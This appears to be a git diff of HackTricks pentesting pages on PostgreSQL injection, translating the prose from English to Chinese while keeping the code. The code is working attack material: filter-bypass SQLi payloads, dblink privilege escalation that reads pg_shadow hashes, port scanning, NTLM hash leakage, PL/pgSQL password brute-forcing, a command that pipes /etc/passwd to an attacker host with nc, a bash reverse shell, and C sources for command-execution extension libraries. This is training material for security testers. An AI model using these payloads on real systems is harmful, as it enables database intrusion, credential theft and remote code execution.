-If you can run **queries** passing them **inside a string** (for example using the **`query_to_xml`** function). **You can use the convert_from to pass the string as hex and bypass filters this way:**
-
+如果您可以运行 **查询** 并将其 **放在字符串中**（例如使用 **`query_to_xml`** 函数）。 **您可以使用 convert_from 将字符串作为十六进制传递，从而以这种方式绕过过滤器：**
 ```sql
 select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
 
@@ -75,28 +68,22 @@ select encode('select cast(string_agg(table_name, '','') as int) from informatio
 # Bypass via boolean + error based + query_to_xml with hex
 1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
 ```
+### 禁止的引号
 
-### Forbidden quotes
-
-If cannot use quotes for your payload you could bypass this with `CHR` for basic clauses (_character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements_):
-
+如果无法为您的有效负载使用引号，您可以通过 `CHR` 绕过此限制，适用于基本子句（_字符连接仅适用于基本查询，例如 SELECT、INSERT、DELETE 等。它不适用于所有 SQL 语句_）：
 ```
 SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
 ```
-
-Or with `$`. This queries return the same results:
-
+或者使用 `$`。这两个查询返回相同的结果：
 ```
 SELECT 'hacktricks';
 SELECT $$hacktricks$$;
 SELECT $TAG$hacktricks$TAG$;
 ```
-
 <figure><img src="../../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘！** (_需要流利的波兰语书写和口语能力_)。
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
index 839c37bb5..5dbc03504 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
@@ -1,84 +1,65 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-### PostgreSQL Large Objects
+### PostgreSQL 大对象
 
-PostgreSQL offers a structure known as **large objects**, accessible via the `pg_largeobject` table, designed for storing large data types, such as images or PDF documents. This approach is advantageous over the `COPY TO` function as it enables the **exportation of data back to the file system**, ensuring an exact replica of the original file is maintained.
+PostgreSQL 提供了一种称为 **大对象** 的结构，通过 `pg_largeobject` 表访问，旨在存储大数据类型，例如图像或 PDF 文档。这种方法相较于 `COPY TO` 函数具有优势，因为它能够 **将数据导出回文件系统**，确保原始文件的精确副本得以保留。
 
-For **storing a complete file** within this table, an object must be created in the `pg_largeobject` table (identified by a LOID), followed by the insertion of data chunks, each 2KB in size, into this object. It is crucial that these chunks are exactly 2KB in size (with the possible exception of the last chunk) to ensure the exporting function performs correctly.
-
-To **divide your binary data** into 2KB chunks, the following commands can be executed:
+要在此表中 **存储完整文件**，必须在 `pg_largeobject` 表中创建一个对象（通过 LOID 识别），然后将每个 2KB 大小的数据块插入到该对象中。这些块的大小必须严格为 2KB（最后一个块可能有例外），以确保导出功能正常运行。
 
+要 **将二进制数据** 划分为 2KB 块，可以执行以下命令：
 ```bash
 split -b 2048 your_file # Creates 2KB sized files
 ```
-
-For encoding each file into Base64 or Hex, the commands below can be used:
-
+对于将每个文件编码为 Base64 或 Hex，可以使用以下命令：
 ```bash
 base64 -w 0 <Chunk_file> # Encodes in Base64 in one line
 xxd -ps -c 99999999999 <Chunk_file> # Encodes in Hex in one line
 ```
+**重要**：在自动化此过程时，请确保发送2KB的明文字节块。由于大小翻倍，十六进制编码文件每个块将需要4KB的数据，而Base64编码文件遵循公式`ceil(n / 3) * 4`。
 
-**Important**: When automating this process, ensure to send chunks of 2KB of clear-text bytes. Hex encoded files will require 4KB of data per chunk due to doubling in size, while Base64 encoded files follow the formula `ceil(n / 3) * 4`.
-
-The contents of the large objects can be viewed for debugging purposes using:
-
+可以使用以下方法查看大对象的内容以进行调试：
 ```sql
 select loid, pageno, encode(data, 'escape') from pg_largeobject;
 ```
+#### 使用 `lo_creat` 和 Base64
 
-#### Using `lo_creat` & Base64
-
-To store binary data, a LOID is first created:
-
+要存储二进制数据，首先创建一个 LOID：
 ```sql
 SELECT lo_creat(-1);       -- Creates a new, empty large object
 SELECT lo_create(173454);  -- Attempts to create a large object with a specific OID
 ```
+在需要精确控制的情况下，例如利用盲 SQL 注入，`lo_create` 更适合用于指定固定的 LOID。
 
-In situations requiring precise control, such as exploiting a Blind SQL Injection, `lo_create` is preferred for specifying a fixed LOID.
-
-Data chunks can then be inserted as follows:
-
+数据块可以如下插入：
 ```sql
 INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 0, decode('<B64 chunk1>', 'base64'));
 INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 1, decode('<B64 chunk2>', 'base64'));
 
 ```
-
-To export and potentially delete the large object after use:
-
+要导出并在使用后可能删除大对象：
 ```sql
 SELECT lo_export(173454, '/tmp/your_file');
 SELECT lo_unlink(173454);  -- Deletes the specified large object
 ```
+#### 使用 `lo_import` 和十六进制
 
-#### Using `lo_import` & Hex
-
-The `lo_import` function can be utilized to create and specify a LOID for a large object:
-
+`lo_import` 函数可用于创建并指定大型对象的 LOID：
 ```sql
 select lo_import('/path/to/file');
 select lo_import('/path/to/file', 173454);
 ```
-
-Following object creation, data is inserted per page, ensuring each chunk does not exceed 2KB:
-
+在对象创建后，数据按页面插入，确保每个块不超过2KB：
 ```sql
 update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=0;
 update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=1;
 ```
-
-To complete the process, the data is exported and the large object is deleted:
-
+为了完成这个过程，数据被导出并且大对象被删除：
 ```sql
 select lo_export(173454, '/path/to/your_file');
 select lo_unlink(173454);  -- Deletes the specified large object
 ```
+### 限制
 
-### Limitations
-
-It's noted that **large objects may have ACLs** (Access Control Lists), potentially restricting access even to objects created by your user. However, older objects with permissive ACLs may still be accessible for content exfiltration.
+需要注意的是，**大对象可能具有 ACLs**（访问控制列表），可能会限制对即使是由您的用户创建的对象的访问。然而，具有宽松 ACLs 的旧对象可能仍然可以访问以进行内容外泄。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md b/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
index 8163d6ce5..72c768a16 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
@@ -1,10 +1,9 @@
-# dblink/lo_import data exfiltration
+# dblink/lo_import 数据外泄
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**This is an example of how to exfiltrate data loading files in the database with `lo_import` and exfiltrate them using `dblink_connect`.**
+**这是一个如何使用 `lo_import` 加载数据库中的文件并使用 `dblink_connect` 进行数据外泄的示例。**
 
-**Check the solution from:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
+**查看解决方案来自：** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md b/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
index 283b6a243..d1357446d 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
@@ -1,70 +1,61 @@
-# Network - Privesc, Port Scanner and NTLM chanllenge response disclosure
+# 网络 - 权限提升、端口扫描和 NTLM 挑战响应泄露
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**Find** [**more information about these attacks in the original paper**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt).
-
-Since **PostgreSQL 9.1**, installation of additional modules is simple. [Registered extensions like `dblink`](https://www.postgresql.org/docs/current/contrib.html) can be installed with [`CREATE EXTENSION`](https://www.postgresql.org/docs/current/sql-createextension.html):
+**查找** [**有关这些攻击的更多信息，请参阅原始论文**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)。
 
+自 **PostgreSQL 9.1** 以来，安装额外模块变得简单。 [注册扩展如 `dblink`](https://www.postgresql.org/docs/current/contrib.html) 可以通过 [`CREATE EXTENSION`](https://www.postgresql.org/docs/current/sql-createextension.html) 安装：
 ```sql
 CREATE EXTENSION dblink;
 ```
+一旦加载了 dblink，您可以执行一些有趣的技巧：
 
-Once you have dblink loaded you could be able to perform some interesting tricks:
-
-### Privilege Escalation
-
-The file `pg_hba.conf` could be bad configured **allowing connections** from **localhost as any user** without needing to know the password. This file could be typically found in `/etc/postgresql/12/main/pg_hba.conf` and a bad configuration looks like:
+### 权限提升
 
+文件 `pg_hba.conf` 可能配置不当 **允许来自 localhost 的任何用户连接**，而无需知道密码。该文件通常位于 `/etc/postgresql/12/main/pg_hba.conf`，不当配置的样子如下：
 ```
 local    all    all    trust
 ```
+_请注意，这种配置通常用于在管理员忘记数据库用户密码时修改密码，因此有时您可能会发现它。_\
+&#xNAN;_&#x4E;请注意，pg_hba.conf 文件仅可由 postgres 用户和组读取，并且仅可由 postgres 用户写入。_
 
-_Note that this configuration is commonly used to modify the password of a db user when the admin forget it, so sometimes you may find it._\
-&#xNAN;_&#x4E;ote also that the file pg_hba.conf is readable only by postgres user and group and writable only by postgres user._
-
-This case is **useful if** you **already** have a **shell** inside the victim as it will allow you to connect to postgresql database.
-
-Another possible misconfiguration consist on something like this:
+这种情况是**有用的，如果**您**已经**在受害者的**shell**中，因为它将允许您连接到 postgresql 数据库。
 
+另一个可能的错误配置类似于这样：
 ```
 host    all     all     127.0.0.1/32    trust
 ```
-
-As it will allow everybody from the localhost to connect to the database as any user.\
-In this case and if the **`dblink`** function is **working**, you could **escalate privileges** by connecting to the database through an already established connection and access data shouldn't be able to access:
-
+因为这将允许来自本地主机的每个人以任何用户身份连接到数据库。\
+在这种情况下，如果 **`dblink`** 函数 **正常工作**，您可以通过通过已建立的连接连接到数据库来 **提升权限**，并访问不应该能够访问的数据：
 ```sql
 SELECT * FROM dblink('host=127.0.0.1
-                          user=postgres
-                          dbname=postgres',
-                         'SELECT datname FROM pg_database')
-                      RETURNS (result TEXT);
+user=postgres
+dbname=postgres',
+'SELECT datname FROM pg_database')
+RETURNS (result TEXT);
 
 SELECT * FROM dblink('host=127.0.0.1
-                          user=postgres
-                          dbname=postgres',
-                         'select usename, passwd from pg_shadow')
-                      RETURNS (result1 TEXT, result2 TEXT);
+user=postgres
+dbname=postgres',
+'select usename, passwd from pg_shadow')
+RETURNS (result1 TEXT, result2 TEXT);
 ```
+### 端口扫描
 
-### Port Scanning
-
-Abusing `dblink_connect` you could also **search open ports**. If that \*\*function doesn't work you should try to use `dblink_connect_u()` as the documentation says that `dblink_connect_u()` is identical to `dblink_connect()`, except that it will allow non-superusers to connect using any authentication method\_.
-
+滥用 `dblink_connect` 你也可以 **搜索开放端口**。如果该 **函数不起作用，你应该尝试使用 `dblink_connect_u()`，因为文档说 `dblink_connect_u()` 与 `dblink_connect()` 是相同的，除了它允许非超级用户使用任何认证方法连接。**
 ```sql
 SELECT * FROM dblink_connect('host=216.58.212.238
-                                  port=443
-                                  user=name
-                                  password=secret
-                                  dbname=abc
-                                  connect_timeout=10');
+port=443
+user=name
+password=secret
+dbname=abc
+connect_timeout=10');
 //Different response
 // Port closed
 RROR:  could not establish connection
 DETAIL:  could not connect to server: Connection refused
-	Is the server running on host "127.0.0.1" and accepting
-	TCP/IP connections on port 4444?
+Is the server running on host "127.0.0.1" and accepting
+TCP/IP connections on port 4444?
 
 // Port Filtered/Timeout
 ERROR:  could not establish connection
@@ -78,15 +69,11 @@ DETAIL:  timeout expired
 ERROR:  could not establish connection
 DETAIL:  received invalid response to SSL negotiation:
 ```
-
-Note that **before** being able to use `dblink_connect` or `dblink_connect_u` you may need to execute:
-
+请注意，在能够使用 `dblink_connect` 或 `dblink_connect_u` 之前，您可能需要执行：
 ```
 CREATE extension dblink;
 ```
-
-### UNC path - NTLM hash disclosure
-
+### UNC 路径 - NTLM 哈希泄露
 ```sql
 -- can be used to leak hashes to Responder/equivalent
 CREATE TABLE test();
@@ -107,6 +94,4 @@ END;
 $$ LANGUAGE plpgsql SECURITY DEFINER;
 SELECT testfunc();
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md b/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
index fca5e37fe..2d7a945cf 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
@@ -1,122 +1,109 @@
-# PL/pgSQL Password Bruteforce
+# PL/pgSQL 密码暴力破解
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**Find [more information about these attack in the original paper](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)**.
+**在原始论文中找到[更多关于这些攻击的信息](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)**。
 
-PL/pgSQL is a **fully featured programming language** that extends beyond the capabilities of SQL by offering **enhanced procedural control**. This includes the utilization of loops and various control structures. Functions crafted in the PL/pgSQL language can be invoked by SQL statements and triggers, broadening the scope of operations within the database environment.
-
-You can abuse this language in order to ask PostgreSQL to brute-force the users credentials, but it must exist on the database. You can verify it's existence using:
+PL/pgSQL 是一种 **功能齐全的编程语言**，通过提供 **增强的过程控制** 超越了 SQL 的能力。这包括使用循环和各种控制结构。用 PL/pgSQL 语言编写的函数可以通过 SQL 语句和触发器调用，从而扩展数据库环境中的操作范围。
 
+您可以利用这种语言要求 PostgreSQL 暴力破解用户凭据，但它必须存在于数据库中。您可以使用以下方法验证它的存在：
 ```sql
 SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
-     lanname | lanacl
-    ---------+---------
-     plpgsql |
+lanname | lanacl
+---------+---------
+plpgsql |
 ```
-
-By default, **creating functions is a privilege granted to PUBLIC**, where PUBLIC refers to every user on that database system. To prevent this, the administrator could have had to revoke the USAGE privilege from the PUBLIC domain:
-
+默认情况下，**创建函数是授予PUBLIC的特权**，其中PUBLIC指的是该数据库系统上的每个用户。为了防止这种情况，管理员可能需要从PUBLIC域撤销USAGE特权：
 ```sql
 REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
 ```
-
-In that case, our previous query would output different results:
-
+在这种情况下，我们之前的查询将输出不同的结果：
 ```sql
 SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
-     lanname | lanacl
-    ---------+-----------------
-     plpgsql | {admin=U/admin}
+lanname | lanacl
+---------+-----------------
+plpgsql | {admin=U/admin}
 ```
-
-Note that for the following script to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with&#x20;
-
+请注意，为了使以下脚本正常工作，**需要存在函数 `dblink`**。如果不存在，您可以尝试使用
 ```sql
 CREATE EXTENSION dblink;
 ```
+## 密码暴力破解
 
-## Password Brute Force
-
-Here how you could perform a 4 chars password bruteforce:
-
+以下是如何执行4个字符密码的暴力破解：
 ```sql
 //Create the brute-force function
 CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
-                                username TEXT, dbname TEXT) RETURNS TEXT AS
+username TEXT, dbname TEXT) RETURNS TEXT AS
 $$
 DECLARE
-    word TEXT;
+word TEXT;
 BEGIN
-    FOR a IN 65..122 LOOP
-        FOR b IN 65..122 LOOP
-            FOR c IN 65..122 LOOP
-                FOR d IN 65..122 LOOP
-                    BEGIN
-                        word := chr(a) || chr(b) || chr(c) || chr(d);
-                        PERFORM(SELECT * FROM dblink(' host=' || host ||
-                                                    ' port=' || port ||
-                                                    ' dbname=' || dbname ||
-                                                    ' user=' || username ||
-                                                    ' password=' || word,
-                                                    'SELECT 1')
-                                                    RETURNS (i INT));
-                                                    RETURN word;
-                        EXCEPTION
-                            WHEN sqlclient_unable_to_establish_sqlconnection
-                                THEN
-                                    -- do nothing
-                    END;
-                END LOOP;
-            END LOOP;
-        END LOOP;
-    END LOOP;
-    RETURN NULL;
+FOR a IN 65..122 LOOP
+FOR b IN 65..122 LOOP
+FOR c IN 65..122 LOOP
+FOR d IN 65..122 LOOP
+BEGIN
+word := chr(a) || chr(b) || chr(c) || chr(d);
+PERFORM(SELECT * FROM dblink(' host=' || host ||
+' port=' || port ||
+' dbname=' || dbname ||
+' user=' || username ||
+' password=' || word,
+'SELECT 1')
+RETURNS (i INT));
+RETURN word;
+EXCEPTION
+WHEN sqlclient_unable_to_establish_sqlconnection
+THEN
+-- do nothing
+END;
+END LOOP;
+END LOOP;
+END LOOP;
+END LOOP;
+RETURN NULL;
 END;
 $$ LANGUAGE 'plpgsql';
 
 //Call the function
 select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
 ```
+_请注意，即使是暴力破解4个字符也可能需要几分钟。_
 
-_Note that even brute-forcing 4 characters may take several minutes._
-
-You could also **download a wordlist** and try only those passwords (dictionary attack):
-
+您还可以**下载一个密码字典**并仅尝试那些密码（字典攻击）：
 ```sql
 //Create the function
 CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
-                                username TEXT, dbname TEXT) RETURNS TEXT AS
+username TEXT, dbname TEXT) RETURNS TEXT AS
 $$
 BEGIN
-    FOR word IN (SELECT word FROM dblink('host=1.2.3.4
-                                            user=name
-                                            password=qwerty
-                                            dbname=wordlists',
-                                            'SELECT word FROM wordlist')
-                                        RETURNS (word TEXT)) LOOP
-        BEGIN
-            PERFORM(SELECT * FROM dblink(' host=' || host ||
-                                            ' port=' || port ||
-                                            ' dbname=' || dbname ||
-                                            ' user=' || username ||
-                                            ' password=' || word,
-                                            'SELECT 1')
-                                        RETURNS (i INT));
-            RETURN word;
+FOR word IN (SELECT word FROM dblink('host=1.2.3.4
+user=name
+password=qwerty
+dbname=wordlists',
+'SELECT word FROM wordlist')
+RETURNS (word TEXT)) LOOP
+BEGIN
+PERFORM(SELECT * FROM dblink(' host=' || host ||
+' port=' || port ||
+' dbname=' || dbname ||
+' user=' || username ||
+' password=' || word,
+'SELECT 1')
+RETURNS (i INT));
+RETURN word;
 
-            EXCEPTION
-                WHEN sqlclient_unable_to_establish_sqlconnection THEN
-                    -- do nothing
-        END;
-    END LOOP;
-    RETURN NULL;
+EXCEPTION
+WHEN sqlclient_unable_to_establish_sqlconnection THEN
+-- do nothing
+END;
+END LOOP;
+RETURN NULL;
 END;
 $$ LANGUAGE 'plpgsql'
 
 -- Call the function
 select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
index bd0555075..1cf638544 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
@@ -4,18 +4,17 @@
 
 ## PostgreSQL Extensions
 
-PostgreSQL has been developed with extensibility as a core feature, allowing it to seamlessly integrate extensions as if they were built-in functionalities. These extensions, essentially libraries written in C, enrich the database with additional functions, operators, or types.
+PostgreSQL 的核心特性是可扩展性，允许它无缝集成扩展，就像内置功能一样。这些扩展本质上是用 C 编写的库，为数据库提供额外的函数、操作符或类型。
 
-From version 8.1 onwards, a specific requirement is imposed on the extension libraries: they must be compiled with a special header. Without this, PostgreSQL will not execute them, ensuring only compatible and potentially secure extensions are used.
+从 8.1 版本开始，对扩展库施加了特定要求：它们必须使用特殊头文件编译。没有这个，PostgreSQL 将不会执行它们，确保只使用兼容且可能安全的扩展。
 
-Also, keep in mind that **if you don't know how to** [**upload files to the victim abusing PostgreSQL you should read this post.**](big-binary-files-upload-postgresql.md)
+此外，请记住 **如果你不知道如何** [**利用 PostgreSQL 上传文件到受害者，你应该阅读这篇文章。**](big-binary-files-upload-postgresql.md)
 
 ### RCE in Linux
 
-**For more information check: [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)**
-
-The execution of system commands from PostgreSQL 8.1 and earlier versions is a process that has been clearly documented and is straightforward. It's possible to use this: [Metasploit module](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload).
+**有关更多信息，请查看: [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)**
 
+从 PostgreSQL 8.1 及更早版本执行系统命令的过程已经被清楚地记录，并且相对简单。可以使用这个: [Metasploit module](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload).
 ```sql
 CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
 SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
@@ -25,89 +24,79 @@ CREATE OR REPLACE FUNCTION open(cstring, int, int) RETURNS int AS '/lib/libc.so.
 CREATE OR REPLACE FUNCTION write(int, cstring, int) RETURNS int AS '/lib/libc.so.6', 'write' LANGUAGE 'C' STRICT;
 CREATE OR REPLACE FUNCTION close(int) RETURNS int AS '/lib/libc.so.6', 'close' LANGUAGE 'C' STRICT;
 ```
-
 <details>
 
-<summary>Write binary file from base64</summary>
-
-To write a binary into a file in postgres you might need to use base64, this will be helpful for that matter:
+<summary>从 base64 写入二进制文件</summary>
 
+要在 postgres 中将二进制写入文件，您可能需要使用 base64，这对这个问题会很有帮助：
 ```sql
 CREATE OR REPLACE FUNCTION write_to_file(file TEXT, s TEXT) RETURNS int AS
-    $$
-    DECLARE
-        fh int;
-        s int;
-        w bytea;
-        i int;
-    BEGIN
-        SELECT open(textout(file)::cstring, 522, 448) INTO fh;
+$$
+DECLARE
+fh int;
+s int;
+w bytea;
+i int;
+BEGIN
+SELECT open(textout(file)::cstring, 522, 448) INTO fh;
 
-        IF fh <= 2 THEN
-            RETURN 1;
-        END IF;
+IF fh <= 2 THEN
+RETURN 1;
+END IF;
 
-        SELECT decode(s, 'base64') INTO w;
+SELECT decode(s, 'base64') INTO w;
 
-        i := 0;
-        LOOP
-            EXIT WHEN i >= octet_length(w);
+i := 0;
+LOOP
+EXIT WHEN i >= octet_length(w);
 
-            SELECT write(fh,textout(chr(get_byte(w, i)))::cstring, 1) INTO rs;
+SELECT write(fh,textout(chr(get_byte(w, i)))::cstring, 1) INTO rs;
 
-            IF rs < 0 THEN
-                RETURN 2;
-            END IF;
+IF rs < 0 THEN
+RETURN 2;
+END IF;
 
-            i := i + 1;
-        END LOOP;
+i := i + 1;
+END LOOP;
 
-        SELECT close(fh) INTO rs;
+SELECT close(fh) INTO rs;
 
-        RETURN 0;
+RETURN 0;
 
-    END;
-    $$ LANGUAGE 'plpgsql';
+END;
+$$ LANGUAGE 'plpgsql';
 ```
-
 </details>
 
-However, when attempted on greater versions **the following error was shown**:
-
+然而，当在更高版本上尝试时 **显示了以下错误**：
 ```c
 ERROR:  incompatible library “/lib/x86_64-linux-gnu/libc.so.6”: missing magic block
 HINT:  Extension libraries are required to use the PG_MODULE_MAGIC macro.
 ```
+此错误在[PostgreSQL文档](https://www.postgresql.org/docs/current/static/xfunc-c.html)中有解释：
 
-This error is explained in the [PostgreSQL documentation](https://www.postgresql.org/docs/current/static/xfunc-c.html):
-
-> To ensure that a dynamically loaded object file is not loaded into an incompatible server, PostgreSQL checks that the file contains a “magic block” with the appropriate contents. This allows the server to detect obvious incompatibilities, such as code compiled for a different major version of PostgreSQL. A magic block is required as of PostgreSQL 8.2. To include a magic block, write this in one (and only one) of the module source files, after having included the header fmgr.h:
+> 为了确保动态加载的对象文件不会加载到不兼容的服务器中，PostgreSQL检查文件是否包含具有适当内容的“魔法块”。这使得服务器能够检测明显的不兼容性，例如为不同主要版本的PostgreSQL编译的代码。从PostgreSQL 8.2开始，魔法块是必需的。要包含魔法块，请在包含头文件fmgr.h之后，在模块源文件中的一个（且仅一个）位置写入以下内容：
 >
 > `#ifdef PG_MODULE_MAGIC`\
 > `PG_MODULE_MAGIC;`\
 > `#endif`
 
-Since PostgreSQL version 8.2, the process for an attacker to exploit the system has been made more challenging. The attacker is required to either utilize a library that is already present on the system or to upload a custom library. This custom library must be compiled against the compatible major version of PostgreSQL and must include a specific "magic block". This measure significantly increases the difficulty of exploiting PostgreSQL systems, as it necessitates a deeper understanding of the system's architecture and version compatibility.
+自PostgreSQL 8.2版本以来，攻击者利用系统的过程变得更加具有挑战性。攻击者需要使用系统上已经存在的库，或者上传自定义库。此自定义库必须针对兼容的PostgreSQL主要版本进行编译，并且必须包含特定的“魔法块”。这一措施显著增加了利用PostgreSQL系统的难度，因为它需要对系统的架构和版本兼容性有更深入的理解。
 
-#### Compile the library
-
-Get the PsotgreSQL version with:
+#### 编译库
 
+获取PostgreSQL版本：
 ```sql
 SELECT version();
 PostgreSQL 9.6.3 on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18) 6.3.0 20170516, 64-bit
 ```
+为了兼容性，主要版本必须对齐。因此，使用9.6.x系列中的任何版本编译库应确保成功集成。
 
-For compatibility, it is essential that the major versions align. Therefore, compiling a library with any version within the 9.6.x series should ensure successful integration.
-
-To install that version in your system:
-
+要在系统中安装该版本：
 ```bash
 apt install postgresql postgresql-server-dev-9.6
 ```
-
-And compile the library:
-
+并编译库：
 ```c
 //gcc -I$(pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c
 #include <string.h>
@@ -120,27 +109,23 @@ PG_MODULE_MAGIC;
 
 PG_FUNCTION_INFO_V1(pg_exec);
 Datum pg_exec(PG_FUNCTION_ARGS) {
-    char* command = PG_GETARG_CSTRING(0);
-    PG_RETURN_INT32(system(command));
+char* command = PG_GETARG_CSTRING(0);
+PG_RETURN_INT32(system(command));
 }
 ```
-
-Then upload the compiled library and execute commands with:
-
+然后上传编译好的库并使用以下命令执行：
 ```bash
 CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE C STRICT;
 SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"');
 #Notice the double single quotes are needed to scape the qoutes
 ```
-
-You can find this **library precompiled** to several different PostgreSQL versions and even can **automate this process** (if you have PostgreSQL access) with:
+您可以找到这个 **预编译的库** 适用于多个不同的 PostgreSQL 版本，甚至可以 **自动化这个过程**（如果您有 PostgreSQL 访问权限）：
 
 {% embed url="https://github.com/Dionach/pgexec" %}
 
-### RCE in Windows
-
-The following DLL takes as input the **name of the binary** and the **number** of **times** you want to execute it and executes it:
+### Windows 中的 RCE
 
+以下 DLL 以 **二进制文件的名称** 和您想要执行的 **次数** 作为输入，并执行它：
 ```c
 #include "postgres.h"
 #include <string.h>
@@ -162,36 +147,32 @@ in a FOR loop bound by the second parameter that is also passed*/
 Datum
 pgsql_exec(PG_FUNCTION_ARGS)
 {
-	/* convert text pointer to C string */
+/* convert text pointer to C string */
 #define GET_STR(textp) DatumGetCString(DirectFunctionCall1(textout, PointerGetDatum(textp)))
 
-	/* retrieve the second argument that is passed to the function (an integer)
-	that will serve as our counter limit*/
+/* retrieve the second argument that is passed to the function (an integer)
+that will serve as our counter limit*/
 
-	int instances = PG_GETARG_INT32(1);
+int instances = PG_GETARG_INT32(1);
 
-	for (int c = 0; c < instances; c++) {
-		/*launch the process passed in the first parameter*/
-		ShellExecute(NULL, "open", GET_STR(PG_GETARG_TEXT_P(0)), NULL, NULL, 1);
-	}
-	PG_RETURN_VOID();
+for (int c = 0; c < instances; c++) {
+/*launch the process passed in the first parameter*/
+ShellExecute(NULL, "open", GET_STR(PG_GETARG_TEXT_P(0)), NULL, NULL, 1);
+}
+PG_RETURN_VOID();
 }
 ```
-
-You can find the DLL compiled in this zip:
+您可以在此 zip 中找到编译的 DLL：
 
 {% file src="../../../images/pgsql_exec.zip" %}
 
-You can indicate to this DLL **which binary to execute** and the number of time to execute it, in this example it will execute `calc.exe` 2 times:
-
+您可以指示此 DLL **要执行哪个二进制文件** 以及执行的次数，在此示例中，它将执行 `calc.exe` 2 次：
 ```bash
 CREATE OR REPLACE FUNCTION remote_exec(text, integer) RETURNS void AS '\\10.10.10.10\shared\pgsql_exec.dll', 'pgsql_exec' LANGUAGE C STRICT;
 SELECT remote_exec('calc.exe', 2);
 DROP FUNCTION remote_exec(text, integer);
 ```
-
